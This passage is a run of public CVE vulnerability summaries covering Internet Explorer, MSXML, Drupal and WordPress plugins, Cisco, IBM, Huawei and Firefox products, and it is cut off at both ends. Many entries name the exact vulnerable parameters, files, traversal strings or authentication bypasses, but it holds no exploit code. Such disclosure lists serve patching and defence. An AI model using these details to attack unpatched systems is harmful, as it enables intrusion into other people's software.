Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CMarkup Use After Free Vulnerability." [CVE-2013-0019] Use-after-free vulnerability in Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer COmWindowProxy Use After Free Vulnerability." [CVE-2013-0018] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer SetCapture Use After Free Vulnerability." [CVE-2013-0015] Microsoft Internet Explorer 6 through 9 does not properly perform auto-selection of the Shift JIS encoding, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site that triggers cross-domain scrolling events, aka "Shift JIS Character Encoding Vulnerability." [CVE-2013-0010] Cross-site scripting (XSS) vulnerability in Microsoft System Center Operations Manager 2007 SP1 and R2 allows remote attackers to inject arbitrary web script or HTML via crafted input, aka "System Center Operations Manager Web Console XSS Vulnerability," a different vulnerability than CVE-2013-0009. [CVE-2013-0009] Cross-site scripting (XSS) vulnerability in Microsoft System Center Operations Manager 2007 SP1 and R2 allows remote attackers to inject arbitrary web script or HTML via crafted input, aka "System Center Operations Manager Web Console XSS Vulnerability," a different vulnerability than CVE-2013-0010. [CVE-2013-0007] Microsoft XML Core Services (aka MSXML) 4.0, 5.0, and 6.0 does not properly parse XML content, which allows remote attackers to execute arbitrary code via a crafted web page, aka "MSXML XSLT Vulnerability." [CVE-2013-0006] Microsoft XML Core Services (aka MSXML) 3.0, 5.0, and 6.0 does not properly parse XML content, which allows remote attackers to execute arbitrary code via a crafted web page, aka "MSXML Integer Truncation Vulnerability." [CVE-2012-6576] Cross-site scripting (XSS) vulnerability in the PRH Search module 7.x-1.x before 7.x-1.1 for Drupal allows remote attackers from certain sources to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-6575] Cross-site scripting (XSS) vulnerability in the Exposed Filter Data module 6.x-1.x before 6.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-6574] Cross-site scripting (XSS) vulnerability in the Fonecta verify module 7.x-1.x before 7.x-1.6 for Drupal allows remote attackers from certain sources to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results. [CVE-2012-6572] Cross-site scripting (XSS) vulnerability in the phptemplate_preprocess_node function in template.php in the Inf08 theme 6.x-1.x before 6.x-1.10 for Drupal allows remote authenticated users with the "administer taxonomy" permission to inject arbitrary web script or HTML via a taxonomy vocabulary name. [CVE-2012-6571] The HTTP module in the (1) Branch Intelligent Management System (BIMS) and (2) web management components on Huawei AR routers and S2000, S3000, S3500, S3900, S5100, S5600, and S7800 switches uses predictable Session ID values, which makes it easier for remote attackers to hijack sessions via a brute-force attack. [CVE-2012-6570] The HTTP module in the (1) Branch Intelligent Management System (BIMS) and (2) web management components on Huawei AR routers and S2000, S3000, S3500, S3900, S5100, S5600, S7800, and S8500 switches does not check whether HTTP data is longer than the value of the Content-Length field, which allows remote HTTP servers to conduct heap-based buffer overflow attacks and execute arbitrary code via a crafted response. [CVE-2012-6569] Stack-based buffer overflow in the HTTP module in the (1) Branch Intelligent Management System (BIMS) and (2) web management components on Huawei AR routers and S2000, S3000, S3500, S3900, S5100, S5600, S7800, and S8500 switches allows remote attackers to execute arbitrary code via a long URI. [CVE-2012-6566] Cross-site scripting (XSS) vulnerability in REDCap before 4.14.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-6565] Cross-site scripting (XSS) vulnerability in REDCap before 4.14.3 allows remote authenticated users to inject arbitrary web script or HTML via uppercase characters in JavaScript events within user-defined labels. [CVE-2012-6564] Cross-site scripting (XSS) vulnerability in REDCap before 4.14.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-6561] Cross-site scripting (XSS) vulnerability in engine/lib/views.php in Elgg before 1.8.5 allows remote attackers to inject arbitrary web script or HTML via the view parameter to index.php. NOTE: some of these details are obtained from third party information. [CVE-2012-6559] Multiple cross-site scripting (XSS) vulnerabilities in FreeNAC 3.02 allow remote attackers to inject arbitrary web script or HTML via the (1) comment, (2) mac, (3) graphtype, (4) name, or (5) type parameter to stats.php [CVE-2012-6557] Multiple cross-site scripting (XSS) vulnerabilities in the AboutMe plugin 1.1.1 for Vanilla Forums allow remote attackers to inject arbitrary web script or HTML via the (1) AboutMe/RealName, (2) AboutMe/Name, (3) AboutMe/Quote, (4) AboutMe/Loc, (5) AboutMe/Emp, (6) AboutMe/JobTit, (7) AboutMe/HS, (8) AboutMe/Col, (9) AboutMe/Bio, (10) AboutMe/Inter, (11) AboutMe/Mus, (12) AboutMe/Gam, (13) AboutMe/Mov, (14) AboutMe/FTV, or (15) AboutMe/Bks parameter to the Edit My Details page. NOTE: some of these details are obtained from third party information. [CVE-2012-6556] Multiple cross-site scripting (XSS) vulnerabilities in the FirstLastNames plugin 1.1.1 for Vanilla Forums allow remote attackers to inject arbitrary web script or HTML via the (1) User/FirstName or (2) User/LastName parameter to the edit user page. NOTE: some of these details are obtained from third party information. [CVE-2012-6555] Cross-site scripting (XSS) vulnerability in the LatestComment plugin 1.1 for Vanilla Forums allows remote attackers to inject arbitrary web script or HTML via the discussion title. [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests. [CVE-2012-6550] Cross-site scripting (XSS) vulnerability in ZeroClipboard before 1.1.4 allows remote attackers to inject arbitrary web script or HTML via "the clipText returned from the flash object," a different vulnerability than CVE-2013-1808. [CVE-2012-6528] Multiple cross-site scripting (XSS) vulnerabilities in ATutor before 2.1 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) themes/default/tile_search/index.tmpl.php, (2) login.php, (3) search.php, (4) password_reminder.php, (5) login.php/jscripts/infusion, (6) login.php/mods/_standard/flowplayer, (7) browse.php/jscripts/infusion/framework/fss, (8) registration.php/themes/default/ie_styles.css, (9) about.php, or (10) themes/default/social/basic_profile.tmpl.php. [CVE-2012-6527] Cross-site scripting (XSS) vulnerability in the My Calendar plugin before 1.10.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2012-6523] Multiple cross-site scripting (XSS) vulnerabilities in w-CMS 2.01 allow remote attackers to inject arbitrary web script or HTML via (1) the p parameter in the getMenus function in codes/wcms.php [CVE-2012-6521] Cross-site scripting (XSS) vulnerability in apps/admin/handlers/versions.php in Elefant CMS 1.2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter to admin/versions. [CVE-2012-6517] Multiple cross-site scripting (XSS) vulnerabilities in DiY-CMS 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) question parameter to in /modules/poll/add.php or (2) question or (3) answer parameter to modules/poll/edit.php. [CVE-2012-6514] Cross-site scripting (XSS) vulnerability in the nBill (com_netinvoice) component 2.3.2 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the message parameter in an income action to administrator/index.php. [CVE-2012-6513] Cross-site scripting (XSS) vulnerability in index.php/Admin_Preferences in gpEasy CMS 2.3.3 allows remote attackers to inject arbitrary web script or HTML via the jsoncallback parameter. [CVE-2012-6511] Multiple cross-site scripting (XSS) vulnerabilities in organizer/page/users.php in the Organizer plugin 1.2.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) delete_id parameter or (2) extension parameter in an "Update Setting" action to wp-admin/admin.php. [CVE-2012-6510] Multiple cross-site scripting (XSS) vulnerabilities in NetArt Media Car Portal 3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) PWRS or (2) Description field when posting a new vehicle [CVE-2012-6506] Multiple cross-site scripting (XSS) vulnerabilities in he Zingiri Web Shop plugin 2.4.0 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter in zing.inc.php or (2) notes parameter in fws/pages-front/onecheckout.php. [CVE-2012-6505] Cross-site scripting (XSS) vulnerability in mods/hours/data/get_hours.php in PHP Volunteer Management 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2012-6499] Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter. [CVE-2012-6469] Opera before 12.11 allows remote attackers to determine the existence of arbitrary local files via vectors involving web script in an error page. [CVE-2012-6467] Opera before 12.10 follows Internet shortcuts that are referenced by a (1) IMG element or (2) other inline element, which makes it easier for remote attackers to conduct phishing attacks via a crafted web site, as exploited in the wild in November 2012. [CVE-2012-6466] Opera before 12.10 does not properly handle incorrect size data in a WebP image, which allows remote attackers to obtain potentially sensitive information from process memory by using a crafted image as the fill pattern for a canvas. [CVE-2012-6464] Cross-site scripting (XSS) vulnerability in Opera before 12.10 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript code that overrides methods of unspecified native objects in documents that have different origins. [CVE-2012-6463] Cross-site scripting (XSS) vulnerability in Opera before 12.10 allows remote attackers to inject arbitrary web script or HTML via vectors involving an unspecified sequence of loading of documents and loading of data: URLs. [CVE-2012-6460] Opera before 11.67 and 12.x before 12.02 allows remote attackers to cause truncation of a dialog, and possibly trigger downloading and execution of arbitrary programs, via a crafted web site. [CVE-2012-6458] Multiple cross-site scripting (XSS) vulnerabilities in the SilverStripe e-commerce module 3.0 for SilverStripe CMS allow remote attackers to inject arbitrary web script or HTML via the (1) FirstName, (2) Surname, or (3) Email parameter to code/forms/OrderFormAddress.php [CVE-2012-6453] Cross-site scripting (XSS) vulnerability in the RSS Reader extension before 0.2.6 for MediaWiki allows remote attackers to inject arbitrary web script or HTML via a crafted feed. [CVE-2012-6440] The web-server password-authentication functionality in Rockwell Automation EtherNet/IP products [CVE-2012-6434] Multiple cross-site request forgery (CSRF) vulnerabilities in e107_admin/download.php in e107 1.0.2 allow remote attackers to hijack the authentication of administrators for requests that conduct SQL injection attacks via the (1) download_url, (2) download_url_extended, (3) download_author_email, (4) download_author_website, (5) download_image, (6) download_thumb, (7) download_visible, or (8) download_class parameter. [CVE-2012-6399] Cisco WebEx 4.1 on iOS does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate, aka Bug ID CSCud94176. [CVE-2012-6397] Cross-site scripting (XSS) vulnerability in Cisco WebEx Social (formerly Cisco Quad) allows remote attackers to inject arbitrary web script or HTML via a crafted RSS service link, aka Bug ID CSCub61977. [CVE-2012-6396] Cisco NX-OS on Nexus 7000 series switches does not properly handle certain line-card replacements, which might allow remote authenticated users to cause a denial of service (memory consumption) via a crafted configuration that references interfaces that do not exist on the new card, aka Bug ID CSCud44300. [CVE-2012-6369] Cross-site scripting (XSS) vulnerability in the Troubleshooting Reporting System feature in AgileBits 1Password 3.9.9 might allow remote attackers to inject arbitrary web script or HTML via a crafted User-Agent HTTP header that is not properly handled in a View Troubleshooting Report action. [CVE-2012-6360] Cross-site scripting (XSS) vulnerability in IBM Intelligent Operations Center 1.5.0 allows remote attackers to inject arbitrary web script or HTML via event data fields. [CVE-2012-6350] Cross-site scripting (XSS) vulnerability in the Web component in IBM Cognos TM1 before 9.5.2 FP3 and 10.1 before 10.1 FP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-6312] Cross-site scripting (XSS) vulnerability in the Video Lead Form plugin for WordPress allows remote attackers to inject arbitrary web script or HTML via the errMsg parameter in a video-lead-form action to wp-admin/admin.php. [CVE-2012-6272] Multiple cross-site scripting (XSS) vulnerabilities in Dell OpenManage Server Administrator 6.5.0.1, 7.0.0.1, and 7.1.0.1 allow remote attackers to inject arbitrary web script or HTML via the topic parameter to html/index_main.htm in (1) help/sm/en/Output/wwhelp/wwhimpl/js/, (2) help/sm/es/Output/wwhelp/wwhimpl/js/, (3) help/sm/ja/Output/wwhelp/wwhimpl/js/, (4) help/sm/de/Output/wwhelp/wwhimpl/js/, (5) help/sm/fr/Output/wwhelp/wwhimpl/js/, (6) help/sm/zh/Output/wwhelp/wwhimpl/js/, (7) help/hip/en/msgguide/wwhelp/wwhimpl/js/, or (8) help/hip/en/msgguide/wwhelp/wwhimpl/common/. [CVE-2012-6148] Cross-site scripting (XSS) vulnerability in the function menu API in TYPO3 4.5.x before 4.5.21, 4.6.x before 4.6.14, and 4.7.x before 4.7.6 allows remote authenticated backend users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-6147] Cross-site scripting (XSS) vulnerability in the tree render API (TCA-Tree) in the Backend API in TYPO3 4.5.x before 4.5.21, 4.6.x before 4.6.14, and 4.7.x before 4.7.6 allows remote authenticated backend users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-6145] Cross-site scripting (XSS) vulnerability in the Backend History module in TYPO3 4.5.x before 4.5.21, 4.6.x before 4.6.14, and 4.7.x before 4.7.6 allows remote authenticated backend users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-6121] Cross-site scripting (XSS) vulnerability in Roundcube Webmail before 0.8.5 allows remote attackers to inject arbitrary web script or HTML via a (1) data:text or (2) vbscript link. [CVE-2012-6101] Multiple open redirect vulnerabilities in Moodle 2.2.x before 2.2.7, 2.3.x before 2.3.4, and 2.4.x before 2.4.1 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via vectors related to (1) backup/backupfilesedit.php, (2) comment/comment_post.php, (3) course/switchrole.php, (4) mod/wiki/filesedit.php, (5) tag/coursetags_add.php, or (6) user/files.php. [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551. [CVE-2012-6082] Cross-site scripting (XSS) vulnerability in the rsslink function in theme/__init__.py in MoinMoin 1.9.5 allows remote attackers to inject arbitrary web script or HTML via the page name in a rss link. [CVE-2012-6074] Cross-site scripting (XSS) vulnerability in CloudBees Jenkins before 1.491, Jenkins LTS before 1.480.1, and Jenkins Enterprise 1.424.x before 1.424.6.13, 1.447.x before 1.447.4.1, and 1.466.x before 1.466.10.1 allows remote authenticated users with write access to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-6073] Open redirect vulnerability in CloudBees Jenkins before 1.491, Jenkins LTS before 1.480.1, and Jenkins Enterprise 1.424.x before 1.424.6.13, 1.447.x before 1.447.4.1, and 1.466.x before 1.466.10.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2012-6068] The Runtime Toolkit in CODESYS Runtime System 2.3.x and 2.4.x does not require authentication, which allows remote attackers to (1) execute commands via the command-line interface in the TCP listener service or (2) transfer files via requests to the TCP listener service. [CVE-2012-6045] Cross-site scripting (XSS) vulnerability in gb/user/index.php in Ramui Forum, possibly 1.0 Beta, allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2012-6043] Cross-site scripting (XSS) vulnerability in downloads.php in PHP-Fusion 7.02.04 allows remote attackers to inject arbitrary web script or HTML via the cat_id parameter. [CVE-2012-6040] Cross-site scripting (XSS) vulnerability in users.php in File King Advanced File Management 1.4 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2012-6037] Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4, and other versions including 1.2, allow remote attackers to inject arbitrary web script or HTML via a CSV header with "unknown fields," which are not properly handled in error messages in the (1) bulk user, (2) group, and (3) group member upload capabilities. NOTE: this issue was originally part of CVE-2012-2243, but that ID was SPLIT due to different issues by different researchers. [CVE-2012-6029] Multiple cross-site scripting (XSS) vulnerabilities in the web-authentication function on the Cisco NAC Appliance 4.9.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) cm or (2) uri parameters to (a) perfigo_weblogin.jsp, or the (3) cm, (4) provider, (5) session, (6) uri, (7) userip, or (8) username parameters to (b) perfigo_cm_validate.jsp, aka Bug ID CSCud15109. [CVE-2012-6007] Cross-site scripting (XSS) vulnerability in screens/base/web_auth_custom.html on Cisco Wireless LAN Controller (WLC) devices with software 7.2.110.0 allows remote authenticated users to inject arbitrary web script or HTML via the headline parameter, aka Bug ID CSCud65187, a different vulnerability than CVE-2012-5992. [CVE-2012-5992] Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Wireless LAN Controller (WLC) devices with software 7.2.110.0 allow remote attackers to hijack the authentication of administrators for requests that (1) add administrative accounts via screens/aaa/mgmtuser_create.html or (2) insert XSS sequences via the headline parameter to screens/base/web_auth_custom.html, aka Bug ID CSCud50283. [CVE-2012-5991] screens/base/web_auth_custom.html on Cisco Wireless LAN Controller (WLC) devices with software 7.2.110.0 allows remote authenticated users to cause a denial of service (device reload) via a certain buttonClicked value in an internal webauth_type request, aka Bug ID CSCud50209. [CVE-2012-5972] Directory traversal vulnerability in the web server in SpecView 2.5 build 853 and earlier allows remote attackers to read arbitrary files via a ... (dot dot dot) in a URI. [CVE-2012-5956] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine AssetExplorer 5.6 before service pack 5614 allow remote attackers to inject arbitrary web script or HTML via fields in XML asset data to discoveryServlet/WsDiscoveryServlet, as demonstrated by the DocRoot/Computer_Information/output element. [CVE-2012-5955] Unspecified vulnerability in the IBM HTTP Server component 5.3 in IBM WebSphere Application Server (WAS) for z/OS allows remote attackers to execute arbitrary commands via unknown vectors. [CVE-2012-5953] IBM WebSphere Message Broker 6.1 before 6.1.0.12, 7.0 before 7.0.0.6, and 8.0 before 8.0.0.2, when the Parse Query Strings option is enabled on an HTTPInput node, allows remote attackers to cause a denial of service (infinite loop) via a crafted query string. [CVE-2012-5952] IBM WebSphere Message Broker 6.1 before 6.1.0.12, 7.0 before 7.0.0.6, and 8.0 before 8.0.0.2 does not validate Basic Authentication credentials before proceeding to WS-Addressing and WS-Security operations, which allows remote attackers to trigger transmission of unauthenticated messages via unspecified vectors. [CVE-2012-5949] Multiple cross-site scripting (XSS) vulnerabilities in IBM TRIRIGA Application Platform 2.x and 3.x before 3.3, and 8, allow remote attackers to inject content, and conduct phishing attacks, via vectors involving (1) the html/en/default/ directory, (2) birt/frameset, (3) WebProcess.srv, (4) sqa/html/en/default/reportTemplate/reportTemplateOrderCols.jsp, or (5) a/html/en/default/om2/omObjectFinder.jsp. [CVE-2012-5948] Multiple cross-site scripting (XSS) vulnerabilities in IBM TRIRIGA Application Platform 2.x and 3.x before 3.3, and 8, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) WebProcess.srv, (2) the html/en/default/ directory, (3) Widget/resource, (4) birt/frameset, or (5) ganttlib/gantt-jws.jnlp. [CVE-2012-5943] Cross-site scripting (XSS) vulnerability in IBM iNotes 8.5.x before 8.5.3 FP4 allows user-assisted remote attackers to inject arbitrary web script or HTML via vectors involving mail, aka SPR JDOE8ZZS9. [CVE-2012-5941] Cross-site scripting (XSS) vulnerability in the WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM Netezza allows remote authenticated users to inject content, and conduct phishing attacks, via unspecified vectors. [CVE-2012-5940] The WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM Netezza, when SSL is not enabled, allows remote attackers to discover credentials by sniffing the network during the authentication process. [CVE-2012-5920] Cross-site scripting (XSS) vulnerability in Google Web Toolkit (GWT) 2.4 through 2.5 Final, as used in JBoss Operations Network (ON) 3.1.1 and possibly other products, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this issue exists because of an incomplete fix for CVE-2012-4563. [CVE-2012-5919] Multiple cross-site scripting (XSS) vulnerabilities in Havalite 1.0.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) find or (2) replace fields to havalite/findReplace.php [CVE-2012-5914] Multiple cross-site scripting (XSS) vulnerabilities in the sed_import function in system/functions.php in Neocrome Seditio build 160 and 161 allow remote attackers to inject arbitrary web script or HTML via the (1) newmsg or (2) rtext parameter. NOTE: some of these details are obtained from third party information. [CVE-2012-5913] Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. [CVE-2012-5911] Cross-site scripting (XSS) vulnerability in blogs/blog1.php in b2evolution 4.1.3 allows remote attackers to inject arbitrary web script or HTML via the message body. [CVE-2012-5908] Cross-site scripting (XSS) vulnerability in admin/modules/user/users.php in MyBB (aka MyBulletinBoard) 1.6.6 allows remote attackers to inject arbitrary web script or HTML via the conditions[usergroup][] parameter in a search action to admin/index.php. [CVE-2012-5906] Multiple cross-site scripting (XSS) vulnerabilities in GreenBrowser 6.1.0117 and 6.1.0216 allow remote attackers to inject arbitrary web script or HTML via (1) the URI in an about: page or (2) the last visited URL in the LastVisitWriteEn function in function.js. [CVE-2012-5903] Cross-site scripting (XSS) vulnerability in Simple Machines Forum (SMF) 2.0.2 allows remote attackers to inject arbitrary web script or HTML via the scheduled parameter to index.php. [CVE-2012-5902] Cross-site scripting (XSS) vulnerability in ptk/lib/modal_bookmark.php in DFLabs PTK 1.0.5 allows remote attackers to inject arbitrary web script or HTML via the arg4 parameter. [CVE-2012-5901] DFLabs PTK 1.0.5 stores data files with predictable names under the web document root with insufficient access control, which allows remote attackers to read logs, images, or reports via a direct request to the file in the (1) log, (2) images, or (3) report directory. [CVE-2012-5899] Cross-site scripting (XSS) vulnerability in admin/action/objects.php in SAMEDIA LandShop 0.9.2 allows remote attackers to inject arbitrary web script or HTML via the OTR_HEADS[] parameter in an edit action. NOTE: some of these details are obtained from third party information. [CVE-2012-5892] Havalite CMS 1.1.0 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the configuration database via a direct request for data/havalite.db3. [CVE-2012-5889] Cross-site scripting (XSS) vulnerability in the powermail extension before 1.6.5 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5888] Cross-site scripting (XSS) vulnerability in Basic SEO Features (seo_basics) extension before 0.8.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5884] The User.get method in Bugzilla/WebService/User.pm in Bugzilla 4.3.2 allows remote attackers to obtain sensitive information about the saved searches of arbitrary users via an XMLRPC request or a JSONRPC request, a different vulnerability than CVE-2012-4198. [CVE-2012-5883] Cross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.8.0 through 2.9.0, as used in Bugzilla 3.7.x and 4.0.x before 4.0.9, 4.1.x and 4.2.x before 4.2.4, and 4.3.x and 4.4.x before 4.4rc1, allows remote attackers to inject arbitrary web script or HTML via vectors related to swfstore.swf, a similar issue to CVE-2010-4209. [CVE-2012-5882] Cross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.5.0 through 2.9.0 allows remote attackers to inject arbitrary web script or HTML via vectors related to uploader.swf, a similar issue to CVE-2010-4208. [CVE-2012-5881] Cross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.4.0 through 2.9.0 allows remote attackers to inject arbitrary web script or HTML via vectors related to charts.swf, a similar issue to CVE-2010-4207. [CVE-2012-5864] The management web pages on the Sinapsi eSolar Light Photovoltaic System Monitor (aka Schneider Electric Ezylog photovoltaic SCADA management server), Sinapsi eSolar, and Sinapsi eSolar DUO with firmware before 2.0.2870_2.2.12 do not require authentication, which allows remote attackers to obtain administrative access via a direct request, as demonstrated by a request to ping.php. [CVE-2012-5856] Cross-site scripting (XSS) vulnerability in the Uk Cookie (aka uk-cookie) plugin for WordPress allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5851] html/parser/XSSAuditor.cpp in WebCore in WebKit, as used in Google Chrome through 22 and Safari 5.1.7, does not consider all possible output contexts of reflected data, which makes it easier for remote attackers to bypass a cross-site scripting (XSS) protection mechanism via a crafted string, aka rdar problem 12019108. [CVE-2012-5841] Mozilla Firefox before 17.0, Firefox ESR 10.x before 10.0.11, Thunderbird before 17.0, Thunderbird ESR 10.x before 10.0.11, and SeaMonkey before 2.14 implement cross-origin wrappers with a filtering behavior that does not properly restrict write actions, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site. [CVE-2012-5838] The copyTexImage2D implementation in the WebGL subsystem in Mozilla Firefox before 17.0, Thunderbird before 17.0, and SeaMonkey before 2.14 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via large image dimensions. [CVE-2012-5837] The Web Developer Toolbar in Mozilla Firefox before 17.0 executes script with chrome privileges, which allows user-assisted remote attackers to conduct cross-site scripting (XSS) attacks via a crafted string. [CVE-2012-5835] Integer overflow in the WebGL subsystem in Mozilla Firefox before 17.0, Firefox ESR 10.x before 10.0.11, Thunderbird before 17.0, Thunderbird ESR 10.x before 10.0.11, and SeaMonkey before 2.14 allows remote attackers to execute arbitrary code or cause a denial of service (invalid write operation) via crafted data. [CVE-2012-5833] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox before 17.0, Firefox ESR 10.x before 10.0.11, Thunderbird before 17.0, Thunderbird ESR 10.x before 10.0.11, and SeaMonkey before 2.14 does not properly interact with Mesa drivers, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via function calls involving certain values of the level parameter. [CVE-2012-5814] Weberknecht, as used in GitHub Gaug.es and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate. [CVE-2012-5765] The Web Client (aka CQ Web) in IBM Rational ClearQuest 7.1.2.x before 7.1.2.9 and 8.0.0.x before 8.0.0.5 allows remote attackers to obtain sensitive information via unspecified vectors that trigger a SQL error message. [CVE-2012-5763] Cross-site request forgery (CSRF) vulnerability in the WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM Netezza allows remote attackers to hijack the authentication of unspecified victims via unknown vectors. [CVE-2012-5762] Cross-site scripting (XSS) vulnerability in the WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM Netezza allows remote authenticated users to inject arbitrary web script or HTML via vectors involving the MHTML protocol. [CVE-2012-5761] Cross-site scripting (XSS) vulnerability in the WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM Netezza allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-5760] SQL injection vulnerability in the WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM Netezza allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. [CVE-2012-5759] The IBM WebSphere DataPower XC10 Appliance 2.0.0.0 through 2.0.0.3 and 2.1.0.0 through 2.1.0.2 allows remote authenticated users to bypass intended administrative-role requirements and perform arbitrary JMX operations via unspecified vectors. [CVE-2012-5757] Cross-site scripting (XSS) vulnerability in the Web Client in IBM Rational ClearQuest 7.1.x before 7.1.2.10 and 8.x before 8.0.0.6 allows remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2012-5756] The IBM WebSphere DataPower XC10 Appliance 2.0.0.0 through 2.0.0.3 and 2.1.0.0 through 2.1.0.2, when a collective configuration is enabled, has a single secret key that is shared across different customers' installations, which allows remote attackers to spoof a container server by (1) sniffing the network to locate a cleartext transmission of this key or (2) leveraging knowledge of this key from another installation. [CVE-2012-5705] Cross-site scripting (XSS) vulnerability in the settings page (admin/settings/hotblocks) in the Hotblocks module 6.x-1.x before 6.x-1.8 for Drupal allows remote authenticated users with the "administer hotblocks" permission to inject arbitrary web script or HTML via the "block names." [CVE-2012-5687] Directory traversal vulnerability in the web-based management feature on the TP-LINK TL-WR841N router with firmware 3.13.9 build 120201 Rel.54965n and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the PATH_INFO to the help/ URI. [CVE-2012-5666] Cross-site scripting (XSS) vulnerability in bookmarks/js/bookmarks.js in ownCloud 4.0.x before 4.0.10 and 4.5.x before 4.5.5 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to apps/bookmark/index.php. [CVE-2012-5665] ownCloud 4.0.x before 4.0.10 and 4.5.x before 4.5.5 does not properly restrict access to settings.php, which allows remote attackers to edit app configurations of user_webdavauth and user_ldap by editing this file. [CVE-2012-5647] Open redirect vulnerability in node-util/www/html/restorer.php in Red Hat OpenShift Origin before 1.0.5-3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the PATH_INFO. [CVE-2012-5629] The default configuration of the (1) LdapLoginModule and (2) LdapExtLoginModule modules in JBoss Enterprise Application Platform (EAP) 4.3.0 CP10, 5.2.0, and 6.0.1, and Enterprise Web Platform (EWP) 5.2.0 allow remote attackers to bypass authentication via an empty password. [CVE-2012-5608] Cross-site scripting (XSS) vulnerability in apps/user_webdavauth/settings.php in ownCloud 4.5.x before 4.5.2 allows remote attackers to inject arbitrary web script or HTML via arbitrary POST parameters. [CVE-2012-5606] Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before 4.0.9 and 4.5.0 allow remote attackers to inject arbitrary web script or HTML via the (1) file name to apps/files_versions/js/versions.js or (2) apps/files/js/filelist.js [CVE-2012-5591] Cross-site scripting (XSS) vulnerability in the Zero Point module 6.x-1.x before 6.x-1.18 and 7.x-1.x before 7.x-1.4 for Drupal allows remote attackers to inject arbitrary web script or HTML via the path aliases. [CVE-2012-5590] SQL injection vulnerability in the Webmail Plus module for Drupal allows remote attackers to execute arbitrary SQL commands via 